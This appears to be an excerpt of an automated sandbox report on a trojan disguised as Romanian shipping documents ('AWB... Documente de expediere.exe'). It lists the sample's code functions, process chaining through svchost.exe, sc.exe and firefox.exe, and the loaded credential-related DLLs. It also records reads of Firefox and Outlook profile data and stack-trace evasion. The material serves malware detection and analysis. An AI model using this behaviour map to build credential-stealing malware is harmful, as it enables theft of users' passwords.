Source: C:\Windows\SysWOW64\sc.exe	Code function: 7_2_03A00770	7_2_03A00770
Source: C:\Windows\SysWOW64\sc.exe	Code function: 7_2_03A24750	7_2_03A24750
Source: C:\Windows\SysWOW64\sc.exe	Code function: 7_2_03A1C6E0	7_2_03A1C6E0
Source: C:\Windows\SysWOW64\sc.exe	Code function: 7_2_03AC0591	7_2_03AC0591
Source: C:\Windows\SysWOW64\sc.exe	Code function: 7_2_03A00535	7_2_03A00535
Source: C:\Windows\SysWOW64\sc.exe	Code function: 7_2_03AAE4F6	7_2_03AAE4F6
Source: C:\Windows\SysWOW64\sc.exe	Code function: 7_2_03AA4420	7_2_03AA4420
Source: C:\Windows\SysWOW64\sc.exe	Code function: 7_2_03AB2446	7_2_03AB2446
Source: C:\Windows\SysWOW64\sc.exe	Code function: 7_2_03AB6BD7	7_2_03AB6BD7
Source: C:\Windows\SysWOW64\sc.exe	Code function: 7_2_03ABAB40	7_2_03ABAB40
Source: C:\Windows\SysWOW64\sc.exe	Code function: 7_2_039FEA80	7_2_039FEA80
Source: C:\Windows\SysWOW64\sc.exe	Code function: 7_2_03A029A0	7_2_03A029A0
Source: C:\Windows\SysWOW64\sc.exe	Code function: 7_2_03ACA9A6	7_2_03ACA9A6
Source: C:\Windows\SysWOW64\sc.exe	Code function: 7_2_03A16962	7_2_03A16962
Source: C:\Windows\SysWOW64\sc.exe	Code function: 7_2_039E68B8	7_2_039E68B8
Source: C:\Windows\SysWOW64\sc.exe	Code function: 7_2_03A2E8F0	7_2_03A2E8F0
Source: C:\Windows\SysWOW64\sc.exe	Code function: 7_2_03A0A840	7_2_03A0A840
Source: C:\Windows\SysWOW64\sc.exe	Code function: 7_2_03A02840	7_2_03A02840
Source: C:\Windows\SysWOW64\sc.exe	Code function: 7_2_03A7EFA0	7_2_03A7EFA0
Source: C:\Windows\SysWOW64\sc.exe	Code function: 7_2_03A0CFE0	7_2_03A0CFE0
Source: C:\Windows\SysWOW64\sc.exe	Code function: 7_2_039F2FC8	7_2_039F2FC8
Source: C:\Windows\SysWOW64\sc.exe	Code function: 7_2_03A42F28	7_2_03A42F28
Source: C:\Windows\SysWOW64\sc.exe	Code function: 7_2_03A20F30	7_2_03A20F30
Source: C:\Windows\SysWOW64\sc.exe	Code function: 7_2_03AA2F30	7_2_03AA2F30
Source: C:\Windows\SysWOW64\sc.exe	Code function: 7_2_03A74F40	7_2_03A74F40
Source: C:\Windows\SysWOW64\sc.exe	Code function: 7_2_03A12E90	7_2_03A12E90
Source: C:\Windows\SysWOW64\sc.exe	Code function: 7_2_03ABCE93	7_2_03ABCE93
Source: C:\Windows\SysWOW64\sc.exe	Code function: 7_2_03ABEEDB	7_2_03ABEEDB
Source: C:\Windows\SysWOW64\sc.exe	Code function: 7_2_03ABEE26	7_2_03ABEE26
Source: C:\Windows\SysWOW64\sc.exe	Code function: 7_2_03A00E59	7_2_03A00E59
Source: C:\Windows\SysWOW64\sc.exe	Code function: 7_2_03A18DBF	7_2_03A18DBF
Source: C:\Windows\SysWOW64\sc.exe	Code function: 7_2_039FADE0	7_2_039FADE0
Source: C:\Windows\SysWOW64\sc.exe	Code function: 7_2_03A0AD00	7_2_03A0AD00
Source: C:\Windows\SysWOW64\sc.exe	Code function: 7_2_03A9CD1F	7_2_03A9CD1F
Source: C:\Windows\SysWOW64\sc.exe	Code function: 7_2_03AA0CB5	7_2_03AA0CB5
Source: C:\Windows\SysWOW64\sc.exe	Code function: 7_2_039F0CF2	7_2_039F0CF2
Source: C:\Windows\SysWOW64\sc.exe	Code function: 7_2_03A00C00	7_2_03A00C00
Source: C:\Windows\SysWOW64\sc.exe	Code function: 7_2_03A4739A	7_2_03A4739A
Source: C:\Windows\SysWOW64\sc.exe	Code function: 7_2_03AB132D	7_2_03AB132D
Source: C:\Windows\SysWOW64\sc.exe	Code function: 7_2_039ED34C	7_2_039ED34C
Source: C:\Windows\SysWOW64\sc.exe	Code function: 7_2_03A052A0	7_2_03A052A0
Source: C:\Windows\SysWOW64\sc.exe	Code function: 7_2_03AA12ED	7_2_03AA12ED
Source: C:\Windows\SysWOW64\sc.exe	Code function: 7_2_03A1B2C0	7_2_03A1B2C0
Source: C:\Windows\SysWOW64\sc.exe	Code function: 7_2_03A0B1B0	7_2_03A0B1B0
Source: C:\Windows\SysWOW64\sc.exe	Code function: 7_2_03ACB16B	7_2_03ACB16B
Source: C:\Windows\SysWOW64\sc.exe	Code function: 7_2_03A3516C	7_2_03A3516C
Source: C:\Windows\SysWOW64\sc.exe	Code function: 7_2_039EF172	7_2_039EF172
Source: C:\Windows\SysWOW64\sc.exe	Code function: 7_2_03AB70E9	7_2_03AB70E9
Source: C:\Windows\SysWOW64\sc.exe	Code function: 7_2_03ABF0E0	7_2_03ABF0E0
Source: C:\Windows\SysWOW64\sc.exe	Code function: 7_2_03A070C0	7_2_03A070C0
Source: C:\Windows\SysWOW64\sc.exe	Code function: 7_2_03AAF0CC	7_2_03AAF0CC
Source: C:\Windows\SysWOW64\sc.exe	Code function: 7_2_03ABF7B0	7_2_03ABF7B0
Source: C:\Windows\SysWOW64\sc.exe	Code function: 7_2_03AB16CC	7_2_03AB16CC
Source: C:\Windows\SysWOW64\sc.exe	Code function: 7_2_03A9D5B0	7_2_03A9D5B0
Source: C:\Windows\SysWOW64\sc.exe	Code function: 7_2_03AB7571	7_2_03AB7571
Source: C:\Windows\SysWOW64\sc.exe	Code function: 7_2_03ABF43F	7_2_03ABF43F
Source: C:\Windows\SysWOW64\sc.exe	Code function: 7_2_039F1460	7_2_039F1460
Source: C:\Windows\SysWOW64\sc.exe	Code function: 7_2_03A1FB80	7_2_03A1FB80
Source: C:\Windows\SysWOW64\sc.exe	Code function: 7_2_03A75BF0	7_2_03A75BF0
Source: C:\Windows\SysWOW64\sc.exe	Code function: 7_2_03A3DBF9	7_2_03A3DBF9
Source: C:\Windows\SysWOW64\sc.exe	Code function: 7_2_03ABFB76	7_2_03ABFB76
Source: C:\Windows\SysWOW64\sc.exe	Code function: 7_2_03A45AA0	7_2_03A45AA0
Source: C:\Windows\SysWOW64\sc.exe	Code function: 7_2_03A9DAAC	7_2_03A9DAAC
Source: C:\Windows\SysWOW64\sc.exe	Code function: 7_2_03AA1AA3	7_2_03AA1AA3
Source: C:\Windows\SysWOW64\sc.exe	Code function: 7_2_03AADAC6	7_2_03AADAC6
Source: C:\Windows\SysWOW64\sc.exe	Code function: 7_2_03A73A6C	7_2_03A73A6C
Source: C:\Windows\SysWOW64\sc.exe	Code function: 7_2_03ABFA49	7_2_03ABFA49
Source: C:\Windows\SysWOW64\sc.exe	Code function: 7_2_03AB7A46	7_2_03AB7A46
Source: C:\Windows\SysWOW64\sc.exe	Code function: 7_2_03A95910	7_2_03A95910
Source: C:\Windows\SysWOW64\sc.exe	Code function: 7_2_03A09950	7_2_03A09950
Source: C:\Windows\SysWOW64\sc.exe	Code function: 7_2_03A1B950	7_2_03A1B950
Source: C:\Windows\SysWOW64\sc.exe	Code function: 7_2_03A038E0	7_2_03A038E0
Source: C:\Windows\SysWOW64\sc.exe	Code function: 7_2_03A6D800	7_2_03A6D800
Source: C:\Windows\SysWOW64\sc.exe	Code function: 7_2_03ABFFB1	7_2_03ABFFB1
Source: C:\Windows\SysWOW64\sc.exe	Code function: 7_2_03A01F92	7_2_03A01F92
Source: C:\Windows\SysWOW64\sc.exe	Code function: 7_2_03ABFF09	7_2_03ABFF09
Source: C:\Windows\SysWOW64\sc.exe	Code function: 7_2_03A09EB0	7_2_03A09EB0
Source: C:\Windows\SysWOW64\sc.exe	Code function: 7_2_03A1FDC0	7_2_03A1FDC0
Source: C:\Windows\SysWOW64\sc.exe	Code function: 7_2_03AB7D73	7_2_03AB7D73
Source: C:\Windows\SysWOW64\sc.exe	Code function: 7_2_03A03D40	7_2_03A03D40
Source: C:\Windows\SysWOW64\sc.exe	Code function: 7_2_03AB1D5A	7_2_03AB1D5A
Source: C:\Windows\SysWOW64\sc.exe	Code function: 7_2_03ABFCF2	7_2_03ABFCF2
Source: C:\Windows\SysWOW64\sc.exe	Code function: 7_2_03A79C32	7_2_03A79C32
Source: C:\Windows\SysWOW64\sc.exe	Code function: 7_2_03222110	7_2_03222110
Source: C:\Windows\SysWOW64\sc.exe	Code function: 7_2_0321CFC0	7_2_0321CFC0
Source: C:\Windows\SysWOW64\sc.exe	Code function: 7_2_0321B320	7_2_0321B320
Source: C:\Windows\SysWOW64\sc.exe	Code function: 7_2_0321B314	7_2_0321B314
Source: C:\Windows\SysWOW64\sc.exe	Code function: 7_2_0321B31C	7_2_0321B31C
Source: C:\Windows\SysWOW64\sc.exe	Code function: 7_2_0321D1E0	7_2_0321D1E0
Source: C:\Windows\SysWOW64\sc.exe	Code function: 7_2_0321B1D0	7_2_0321B1D0
Source: C:\Windows\SysWOW64\sc.exe	Code function: 7_2_032257D0	7_2_032257D0
Source: C:\Windows\SysWOW64\sc.exe	Code function: 7_2_032239D0	7_2_032239D0
Source: C:\Windows\SysWOW64\sc.exe	Code function: 7_2_0323BF80	7_2_0323BF80
Source: C:\Windows\SysWOW64\sc.exe	Code function: 7_2_0384E563	7_2_0384E563
Source: C:\Windows\SysWOW64\sc.exe	Code function: 7_2_0384E448	7_2_0384E448
Source: C:\Windows\SysWOW64\sc.exe	Code function: 7_2_0384D9C8	7_2_0384D9C8
Source: C:\Windows\SysWOW64\sc.exe	Code function: 7_2_0384E8FD	7_2_0384E8FD
Source: C:\Windows\SysWOW64\sc.exe	Code function: 7_2_0384CC73	7_2_0384CC73

Source: C:\Windows\SysWOW64\svchost.exe	Code function: String function: 03675130 appears 36 times
Source: C:\Windows\SysWOW64\svchost.exe	Code function: String function: 036BF290 appears 105 times
Source: C:\Windows\SysWOW64\svchost.exe	Code function: String function: 036AEA12 appears 86 times
Source: C:\Windows\SysWOW64\svchost.exe	Code function: String function: 0362B970 appears 272 times
Source: C:\Windows\SysWOW64\svchost.exe	Code function: String function: 03687E54 appears 97 times
Source: C:\Users\user\Desktop\AWB_5771388044 Documente de expediere.exe	Code function: String function: 009A7DE1 appears 35 times
Source: C:\Users\user\Desktop\AWB_5771388044 Documente de expediere.exe	Code function: String function: 009C8900 appears 42 times
Source: C:\Users\user\Desktop\AWB_5771388044 Documente de expediere.exe	Code function: String function: 009C0AE3 appears 70 times
Source: C:\Windows\SysWOW64\sc.exe	Code function: String function: 03A6EA12 appears 86 times
Source: C:\Windows\SysWOW64\sc.exe	Code function: String function: 03A35130 appears 58 times
Source: C:\Windows\SysWOW64\sc.exe	Code function: String function: 039EB970 appears 280 times
Source: C:\Windows\SysWOW64\sc.exe	Code function: String function: 03A47E54 appears 101 times
Source: C:\Windows\SysWOW64\sc.exe	Code function: String function: 03A7F290 appears 105 times

Source: AWB_5771388044 Documente de expediere.exe, 00000000.00000003.1379366195.0000000003823000.00000004.00001000.00020000.00000000.sdmp	Binary or memory string: OriginalFilenamentdll.dllj% vs AWB_5771388044 Documente de expediere.exe
Source: AWB_5771388044 Documente de expediere.exe, 00000000.00000003.1380308880.00000000039CD000.00000004.00001000.00020000.00000000.sdmp	Binary or memory string: OriginalFilenamentdll.dllj% vs AWB_5771388044 Documente de expediere.exe

Source: AWB_5771388044 Documente de expediere.exe

Static PE information: EXECUTABLE_IMAGE, LARGE_ADDRESS_AWARE, 32BIT_MACHINE

Source: classification engine

Classification label: mal100.troj.spyw.evad.winEXE@7/3@3/3

Source: C:\Users\user\Desktop\AWB_5771388044 Documente de expediere.exe

Code function: 0_2_00A0A06A GetLastError,FormatMessageW,

0_2_00A0A06A

Source: C:\Users\user\Desktop\AWB_5771388044 Documente de expediere.exe	Code function: 0_2_009F81CB AdjustTokenPrivileges,CloseHandle,		0_2_009F81CB
Source: C:\Users\user\Desktop\AWB_5771388044 Documente de expediere.exe	Code function: 0_2_009F87E1 LookupPrivilegeValueW,AdjustTokenPrivileges,GetLastError,		0_2_009F87E1

Source: C:\Users\user\Desktop\AWB_5771388044 Documente de expediere.exe

Code function: 0_2_00A0B3FB SetErrorMode,GetDiskFreeSpaceExW,SetErrorMode,

0_2_00A0B3FB

Source: C:\Users\user\Desktop\AWB_5771388044 Documente de expediere.exe

Code function: 0_2_00A1EE0D CreateToolhelp32Snapshot,Process32FirstW,Process32NextW,CloseHandle,

0_2_00A1EE0D

Source: C:\Users\user\Desktop\AWB_5771388044 Documente de expediere.exe

Code function: 0_2_00A183BB CoInitialize,CoUninitialize,CoCreateInstance,IIDFromString,VariantInit,VariantClear,

0_2_00A183BB

Source: C:\Users\user\Desktop\AWB_5771388044 Documente de expediere.exe

Code function: 0_2_009A4E89 CreateStreamOnHGlobal,FindResourceExW,LoadResource,SizeofResource,LockResource,

0_2_009A4E89

Source: C:\Users\user\Desktop\AWB_5771388044 Documente de expediere.exe

File created: C:\Users\user\AppData\Local\Temp\autEEC2.tmp

Source: AWB_5771388044 Documente de expediere.exe

Static PE information: Section: .text IMAGE_SCN_CNT_CODE, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ

Source: C:\Program Files\Mozilla Firefox\firefox.exe

File read: C:\Users\user\AppData\Roaming\Mozilla\Firefox\profiles.ini

Source: C:\Users\user\Desktop\AWB_5771388044 Documente de expediere.exe

Key opened: HKEY_CURRENT_USER\Software\Policies\Microsoft\Windows\Safer\CodeIdentifiers

Source: sc.exe, 00000007.00000003.2200327220.0000000003506000.00000004.00000020.00020000.00000000.sdmp, sc.exe, 00000007.00000002.2583431211.0000000003526000.00000004.00000020.00020000.00000000.sdmp, sc.exe, 00000007.00000003.2202313368.00000000034D2000.00000004.00000020.00020000.00000000.sdmp, sc.exe, 00000007.00000002.2583431211.00000000034F3000.00000004.00000020.00020000.00000000.sdmp, sc.exe, 00000007.00000003.2202313368.00000000034F3000.00000004.00000020.00020000.00000000.sdmp, sc.exe, 00000007.00000003.2202313368.0000000003526000.00000004.00000020.00020000.00000000.sdmp, sc.exe, 00000007.00000003.2200439077.00000000034F3000.00000004.00000020.00020000.00000000.sdmp

Binary or memory string: CREATE TABLE password_notes (id INTEGER PRIMARY KEY AUTOINCREMENT, parent_id INTEGER NOT NULL REFERENCES logins ON UPDATE CASCADE ON DELETE CASCADE DEFERRABLE INITIALLY DEFERRED, key VARCHAR NOT NULL, value BLOB, date_created INTEGER NOT NULL, confidential INTEGER, UNIQUE (parent_id, key));

Source: AWB_5771388044 Documente de expediere.exe

ReversingLabs: Detection: 52%

Source: unknown	Process created: C:\Users\user\Desktop\AWB_5771388044 Documente de expediere.exe "C:\Users\user\Desktop\AWB_5771388044 Documente de expediere.exe"
Source: C:\Users\user\Desktop\AWB_5771388044 Documente de expediere.exe	Process created: C:\Windows\SysWOW64\svchost.exe "C:\Users\user\Desktop\AWB_5771388044 Documente de expediere.exe"
Source: C:\Program Files (x86)\gXVCqRNOzOibuFXiseqZQlBHuSkWCDrzLlwHFybcUlDmIqNrdAwDnshXcPEsdGYRebR\hcwvcDPvVeAzsY.exe	Process created: C:\Windows\SysWOW64\sc.exe "C:\Windows\SysWOW64\sc.exe"
Source: C:\Windows\SysWOW64\sc.exe	Process created: C:\Program Files\Mozilla Firefox\firefox.exe "C:\Program Files\Mozilla Firefox\Firefox.exe"
Source: C:\Users\user\Desktop\AWB_5771388044 Documente de expediere.exe	Process created: C:\Windows\SysWOW64\svchost.exe "C:\Users\user\Desktop\AWB_5771388044 Documente de expediere.exe"	Jump to behavior
Source: C:\Program Files (x86)\gXVCqRNOzOibuFXiseqZQlBHuSkWCDrzLlwHFybcUlDmIqNrdAwDnshXcPEsdGYRebR\hcwvcDPvVeAzsY.exe	Process created: C:\Windows\SysWOW64\sc.exe "C:\Windows\SysWOW64\sc.exe"	Jump to behavior
Source: C:\Windows\SysWOW64\sc.exe	Process created: C:\Program Files\Mozilla Firefox\firefox.exe "C:\Program Files\Mozilla Firefox\Firefox.exe"	Jump to behavior

Source: C:\Users\user\Desktop\AWB_5771388044 Documente de expediere.exe	Section loaded: wsock32.dll	Jump to behavior
Source: C:\Users\user\Desktop\AWB_5771388044 Documente de expediere.exe	Section loaded: version.dll	Jump to behavior
Source: C:\Users\user\Desktop\AWB_5771388044 Documente de expediere.exe	Section loaded: winmm.dll	Jump to behavior
Source: C:\Users\user\Desktop\AWB_5771388044 Documente de expediere.exe	Section loaded: mpr.dll	Jump to behavior
Source: C:\Users\user\Desktop\AWB_5771388044 Documente de expediere.exe	Section loaded: wininet.dll	Jump to behavior
Source: C:\Users\user\Desktop\AWB_5771388044 Documente de expediere.exe	Section loaded: iphlpapi.dll	Jump to behavior
Source: C:\Users\user\Desktop\AWB_5771388044 Documente de expediere.exe	Section loaded: userenv.dll	Jump to behavior
Source: C:\Users\user\Desktop\AWB_5771388044 Documente de expediere.exe	Section loaded: uxtheme.dll	Jump to behavior
Source: C:\Users\user\Desktop\AWB_5771388044 Documente de expediere.exe	Section loaded: kernel.appcore.dll	Jump to behavior
Source: C:\Users\user\Desktop\AWB_5771388044 Documente de expediere.exe	Section loaded: windows.storage.dll	Jump to behavior
Source: C:\Users\user\Desktop\AWB_5771388044 Documente de expediere.exe	Section loaded: wldp.dll	Jump to behavior
Source: C:\Users\user\Desktop\AWB_5771388044 Documente de expediere.exe	Section loaded: ntmarta.dll	Jump to behavior
Source: C:\Windows\SysWOW64\sc.exe	Section loaded: wininet.dll	Jump to behavior
Source: C:\Windows\SysWOW64\sc.exe	Section loaded: kernel.appcore.dll	Jump to behavior
Source: C:\Windows\SysWOW64\sc.exe	Section loaded: uxtheme.dll	Jump to behavior
Source: C:\Windows\SysWOW64\sc.exe	Section loaded: ieframe.dll	Jump to behavior
Source: C:\Windows\SysWOW64\sc.exe	Section loaded: iertutil.dll	Jump to behavior
Source: C:\Windows\SysWOW64\sc.exe	Section loaded: netapi32.dll	Jump to behavior
Source: C:\Windows\SysWOW64\sc.exe	Section loaded: version.dll	Jump to behavior
Source: C:\Windows\SysWOW64\sc.exe	Section loaded: userenv.dll	Jump to behavior
Source: C:\Windows\SysWOW64\sc.exe	Section loaded: winhttp.dll	Jump to behavior
Source: C:\Windows\SysWOW64\sc.exe	Section loaded: wkscli.dll	Jump to behavior
Source: C:\Windows\SysWOW64\sc.exe	Section loaded: netutils.dll	Jump to behavior
Source: C:\Windows\SysWOW64\sc.exe	Section loaded: sspicli.dll	Jump to behavior
Source: C:\Windows\SysWOW64\sc.exe	Section loaded: windows.storage.dll	Jump to behavior
Source: C:\Windows\SysWOW64\sc.exe	Section loaded: wldp.dll	Jump to behavior
Source: C:\Windows\SysWOW64\sc.exe	Section loaded: profapi.dll	Jump to behavior
Source: C:\Windows\SysWOW64\sc.exe	Section loaded: secur32.dll	Jump to behavior
Source: C:\Windows\SysWOW64\sc.exe	Section loaded: mlang.dll	Jump to behavior
Source: C:\Windows\SysWOW64\sc.exe	Section loaded: propsys.dll	Jump to behavior
Source: C:\Windows\SysWOW64\sc.exe	Section loaded: winsqlite3.dll	Jump to behavior
Source: C:\Windows\SysWOW64\sc.exe	Section loaded: vaultcli.dll	Jump to behavior
Source: C:\Windows\SysWOW64\sc.exe	Section loaded: wintypes.dll	Jump to behavior
Source: C:\Windows\SysWOW64\sc.exe	Section loaded: dpapi.dll	Jump to behavior
Source: C:\Windows\SysWOW64\sc.exe	Section loaded: cryptbase.dll	Jump to behavior
Source: C:\Program Files (x86)\gXVCqRNOzOibuFXiseqZQlBHuSkWCDrzLlwHFybcUlDmIqNrdAwDnshXcPEsdGYRebR\hcwvcDPvVeAzsY.exe	Section loaded: wininet.dll	Jump to behavior
Source: C:\Program Files (x86)\gXVCqRNOzOibuFXiseqZQlBHuSkWCDrzLlwHFybcUlDmIqNrdAwDnshXcPEsdGYRebR\hcwvcDPvVeAzsY.exe	Section loaded: mswsock.dll	Jump to behavior
Source: C:\Program Files (x86)\gXVCqRNOzOibuFXiseqZQlBHuSkWCDrzLlwHFybcUlDmIqNrdAwDnshXcPEsdGYRebR\hcwvcDPvVeAzsY.exe	Section loaded: dnsapi.dll	Jump to behavior
Source: C:\Program Files (x86)\gXVCqRNOzOibuFXiseqZQlBHuSkWCDrzLlwHFybcUlDmIqNrdAwDnshXcPEsdGYRebR\hcwvcDPvVeAzsY.exe	Section loaded: iphlpapi.dll	Jump to behavior
Source: C:\Program Files (x86)\gXVCqRNOzOibuFXiseqZQlBHuSkWCDrzLlwHFybcUlDmIqNrdAwDnshXcPEsdGYRebR\hcwvcDPvVeAzsY.exe	Section loaded: fwpuclnt.dll	Jump to behavior
Source: C:\Program Files (x86)\gXVCqRNOzOibuFXiseqZQlBHuSkWCDrzLlwHFybcUlDmIqNrdAwDnshXcPEsdGYRebR\hcwvcDPvVeAzsY.exe	Section loaded: rasadhlp.dll	Jump to behavior

Source: C:\Windows\SysWOW64\sc.exe

Key value queried: HKEY_LOCAL_MACHINE\SOFTWARE\Classes\WOW6432Node\CLSID\{3C374A40-BAE4-11CF-BF7D-00AA006946EE}\InProcServer32

Source: C:\Windows\SysWOW64\sc.exe

Key opened: HKEY_CURRENT_USER\SOFTWARE\Microsoft\Office\15.0\Outlook\Profiles\Outlook\

Switches to a custom stack to bypass stack traces

Source: AWB_5771388044 Documente de expediere.exe

Static file information: File size 1214976 > 1048576

Source: AWB_5771388044 Documente de expediere.exe	Static PE information: data directory type: IMAGE_DIRECTORY_ENTRY_IMPORT
Source: AWB_5771388044 Documente de expediere.exe	Static PE information: data directory type: IMAGE_DIRECTORY_ENTRY_RESOURCE
Source: AWB_5771388044 Documente de expediere.exe	Static PE information: data directory type: IMAGE_DIRECTORY_ENTRY_BASERELOC
Source: AWB_5771388044 Documente de expediere.exe	Static PE information: data directory type: IMAGE_DIRECTORY_ENTRY_DEBUG
Source: AWB_5771388044 Documente de expediere.exe	Static PE information: data directory type: IMAGE_DIRECTORY_ENTRY_LOAD_CONFIG
Source: AWB_5771388044 Documente de expediere.exe	Static PE information: data directory type: IMAGE_DIRECTORY_ENTRY_IAT

Source: AWB_5771388044 Documente de expediere.exe

Static PE information: data directory type: IMAGE_DIRECTORY_ENTRY_DEBUG

Source:	Binary string: R:\JoeSecurity\trunk\src\windows\usermode\tools\FakeChrome\Release\Chrome.pdb source: hcwvcDPvVeAzsY.exe, 00000006.00000002.2583629834.0000000000C7E000.00000002.00000001.01000000.00000005.sdmp, hcwvcDPvVeAzsY.exe, 00000008.00000002.2583406804.0000000000C7E000.00000002.00000001.01000000.00000005.sdmp
Source:	Binary string: wntdll.pdbUGP source: AWB_5771388044 Documente de expediere.exe, 00000000.00000003.1380185772.0000000003700000.00000004.00001000.00020000.00000000.sdmp, AWB_5771388044 Documente de expediere.exe, 00000000.00000003.1378980100.00000000038A0000.00000004.00001000.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.1918412588.0000000003400000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000002.2016840599.0000000003600000.00000040.00001000.00020000.00000000.sdmp, svchost.exe, 00000002.00000002.2016840599.000000000379E000.00000040.00001000.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.1916159024.0000000003200000.00000004.00000020.00020000.00000000.sdmp, sc.exe, 00000007.00000003.2018602151.000000000380B000.00000004.00000020.00020000.00000000.sdmp, sc.exe, 00000007.00000002.2585104371.00000000039C0000.00000040.00001000.00020000.00000000.sdmp, sc.exe, 00000007.00000002.2585104371.0000000003B5E000.00000040.00001000.00020000.00000000.sdmp, sc.exe, 00000007.00000003.2016788999.0000000003657000.00000004.00000020.00020000.00000000.sdmp
Source:	Binary string: sc.pdbUGP source: svchost.exe, 00000002.00000003.1985783468.000000000303B000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.1984241134.000000000301A000.00000004.00000020.00020000.00000000.sdmp, hcwvcDPvVeAzsY.exe, 00000006.00000002.2583838367.0000000000E49000.00000004.00000020.00020000.00000000.sdmp, hcwvcDPvVeAzsY.exe, 00000006.00000003.1952567703.0000000000E3B000.00000004.00000020.00020000.00000000.sdmp
Source:	Binary string: wntdll.pdb source: AWB_5771388044 Documente de expediere.exe, 00000000.00000003.1380185772.0000000003700000.00000004.00001000.00020000.00000000.sdmp, AWB_5771388044 Documente de expediere.exe, 00000000.00000003.1378980100.00000000038A0000.00000004.00001000.00020000.00000000.sdmp, svchost.exe, svchost.exe, 00000002.00000003.1918412588.0000000003400000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000002.2016840599.0000000003600000.00000040.00001000.00020000.00000000.sdmp, svchost.exe, 00000002.00000002.2016840599.000000000379E000.00000040.00001000.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.1916159024.0000000003200000.00000004.00000020.00020000.00000000.sdmp, sc.exe, sc.exe, 00000007.00000003.2018602151.000000000380B000.00000004.00000020.00020000.00000000.sdmp, sc.exe, 00000007.00000002.2585104371.00000000039C0000.00000040.00001000.00020000.00000000.sdmp, sc.exe, 00000007.00000002.2585104371.0000000003B5E000.00000040.00001000.00020000.00000000.sdmp, sc.exe, 00000007.00000003.2016788999.0000000003657000.00000004.00000020.00020000.00000000.sdmp
Source:	Binary string: sc.pdb source: svchost.exe, 00000002.00000003.1985783468.000000000303B000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.1984241134.000000000301A000.00000004.00000020.00020000.00000000.sdmp, hcwvcDPvVeAzsY.exe, 00000006.00000002.2583838367.0000000000E49000.00000004.00000020.00020000.00000000.sdmp, hcwvcDPvVeAzsY.exe, 00000006.00000003.1952567703.0000000000E3B000.00000004.00000020.00020000.00000000.sdmp
Source:	Binary string: svchost.pdb source: sc.exe, 00000007.00000002.2583431211.000000000346E000.00000004.00000020.00020000.00000000.sdmp, sc.exe, 00000007.00000002.2585504676.0000000003FEC000.00000004.10000000.00040000.00000000.sdmp, hcwvcDPvVeAzsY.exe, 00000008.00000002.2584883100.000000000300C000.00000004.00000001.00040000.00000000.sdmp, firefox.exe, 0000000A.00000002.2307969500.000000000E84C000.00000004.80000000.00040000.00000000.sdmp
Source:	Binary string: svchost.pdbUGP source: sc.exe, 00000007.00000002.2583431211.000000000346E000.00000004.00000020.00020000.00000000.sdmp, sc.exe, 00000007.00000002.2585504676.0000000003FEC000.00000004.10000000.00040000.00000000.sdmp, hcwvcDPvVeAzsY.exe, 00000008.00000002.2584883100.000000000300C000.00000004.00000001.00040000.00000000.sdmp, firefox.exe, 0000000A.00000002.2307969500.000000000E84C000.00000004.80000000.00040000.00000000.sdmp

Source: AWB_5771388044 Documente de expediere.exe	Static PE information: Data directory: IMAGE_DIRECTORY_ENTRY_IMPORT is in: .rdata
Source: AWB_5771388044 Documente de expediere.exe	Static PE information: Data directory: IMAGE_DIRECTORY_ENTRY_RESOURCE is in: .rsrc
Source: AWB_5771388044 Documente de expediere.exe	Static PE information: Data directory: IMAGE_DIRECTORY_ENTRY_BASERELOC is in: .reloc
Source: AWB_5771388044 Documente de expediere.exe	Static PE information: Data directory: IMAGE_DIRECTORY_ENTRY_LOAD_CONFIG is in: .rdata
Source: AWB_5771388044 Documente de expediere.exe	Static PE information: Data directory: IMAGE_DIRECTORY_ENTRY_IAT is in: .rdata

Source: C:\Users\user\Desktop\AWB_5771388044 Documente de expediere.exe

Code function: 0_2_009A4B37 LoadLibraryA,GetProcAddress,

0_2_009A4B37

Source: C:\Users\user\Desktop\AWB_5771388044 Documente de expediere.exe	Code function: 0_2_009C8945 push ecx; ret	0_2_009C8958
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_0040184C push E711456Eh; retf	2_2_00401809
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_00416063 push esi; retf	2_2_0041606E
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_004021E1 push ss; retf	2_2_004021E4
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_00414992 push ebp; iretd	2_2_004149B6
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_00417A42 push ss; iretd	2_2_00417A4C
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_004073CC push ds; iretd	2_2_00407424
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_004073D3 push ds; iretd	2_2_00407424
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_004163A6 push 0000005Ch; iretd	2_2_004163B2
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_00403440 push eax; ret	2_2_00403442
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_00418451 pushad ; iretd	2_2_00418474
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_00411E78 push esp; ret	2_2_00411E79
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_00408601 push ds; retf	2_2_00408602
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_0040AE01 push cs; ret	2_2_0040AE02
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_0040A763 push 689E092Ah; ret	2_2_0040A775
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_036309AD push ecx; mov dword ptr [esp], ecx	2_2_036309B6
Source: C:\Program Files (x86)\gXVCqRNOzOibuFXiseqZQlBHuSkWCDrzLlwHFybcUlDmIqNrdAwDnshXcPEsdGYRebR\hcwvcDPvVeAzsY.exe	Code function: 6_2_02DD72A0 pushad ; iretd	6_2_02DD72C3
Source: C:\Program Files (x86)\gXVCqRNOzOibuFXiseqZQlBHuSkWCDrzLlwHFybcUlDmIqNrdAwDnshXcPEsdGYRebR\hcwvcDPvVeAzsY.exe	Code function: 6_2_02DC621B push ds; iretd	6_2_02DC6273
